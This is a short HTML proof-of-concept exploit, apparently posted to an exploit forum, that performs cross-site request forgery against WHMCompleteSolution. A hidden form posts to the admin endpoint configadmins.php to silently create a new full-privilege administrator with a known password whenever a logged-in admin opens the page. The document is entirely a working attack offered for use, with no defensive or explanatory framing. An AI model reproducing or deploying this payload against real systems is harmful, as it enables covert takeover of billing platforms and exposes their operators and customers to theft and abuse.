[php]<html>
<head>
<title>WHMCompleteSolution [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/AdminPath/configadmins.php?action=addnow">
<input type="hidden" name="roleid" value="1"/>
<input type="hidden" name="firstname" value="Mohammad"/>
<input type="hidden" name="lastname" value="Hussien"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="username" value="Admin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="password2" value="123456"/>
<input type="hidden" name="signature" value="Iam Palestinian"/>
<input type="hidden" name="notes" value="Iam Palestinian"/>
</form>
</body>
</html> [/php]